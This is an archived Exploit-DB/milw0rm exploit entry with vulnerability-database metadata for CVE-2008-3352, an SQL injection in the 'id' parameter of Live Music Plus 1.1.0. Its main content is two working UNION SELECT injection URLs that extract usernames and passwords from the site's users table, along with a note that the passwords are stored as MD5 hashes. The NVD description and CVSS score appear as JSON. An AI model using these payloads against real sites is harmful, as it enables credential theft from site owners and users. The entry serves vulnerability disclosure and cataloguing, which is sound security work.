Live Music Plus 1.1.0 id Remote SQL Injection Vulnerability
2008-07-24T00:00:00
ID EDB-ID:6128 Type exploitdb Reporter IRAQI Modified 2008-07-24T00:00:00
Description
Live Music Plus 1.1.0 (id) Remote SQL Injection Vulnerability. CVE-2008-3352. Webapps exploit for php platform
###############################################################
#################### i love abeer ####################
##
## Remote SQL injection Vulnerability
##
## Live Music Plus v1.1.0
##
###############################################################
###############################################################
##
## AuTh0r : IRAQI
##
##
##
## Email : expl0it.zone@googlemail.com
##
##
########################
########################
##
## -[[: Exploite :]]-
##
## http://www.xxx.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/*
##
## index.php?act=Singer&id=-1 UNION SELECT 1,password,3,4,5,6 FROM a5421577_db2.users--
##
########################
########################
1) Download script : http://www.nersoft.com/
2) Passwords Md5
#############################################################################
# milw0rm.com [2008-07-24]
{"id": "EDB-ID:6128", "hash": "da1bdb40916a750e379a5435bc31132b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Live Music Plus 1.1.0 id Remote SQL Injection Vulnerability", "description": "Live Music Plus 1.1.0 (id) Remote SQL Injection Vulnerability. CVE-2008-3352. Webapps exploit for php platform", "published": "2008-07-24T00:00:00", "modified": "2008-07-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6128/", "reporter": "IRAQI", "references": [], "cvelist": ["CVE-2008-3352"], "lastseen": "2016-02-01T00:16:12", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3352"]}], "modified": "2016-02-01T00:16:12"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/6128/", "sourceData": "###############################################################\n#################### i love abeer ####################\n##\n## Remote SQL injection Vulnerability\n##\n## Live Music Plus v1.1.0\n## \n###############################################################\n###############################################################\n##\n## AuTh0r : IRAQI\n\n##\n##\n##\n## Email : expl0it.zone@googlemail.com\n##\n##\n########################\n########################\n##\n## -[[: Exploite :]]-\n##\n## http://www.xxx.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/*\n##\n## index.php?act=Singer&id=-1 UNION SELECT 1,password,3,4,5,6 FROM a5421577_db2.users--\n##\n########################\n########################\n \n1) Download script : http://www.nersoft.com/\n2) Passwords Md5\n \n#############################################################################\n\n# milw0rm.com [2008-07-24]\n", "osvdbidlist": ["47139"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:26:00", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in index.php in Live Music Plus 1.1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter in a Singer action.", "modified": "2017-09-28T21:31:38", "published": "2008-07-28T13:41:00", "id": "CVE-2008-3352", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3352", "title": "CVE-2008-3352", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
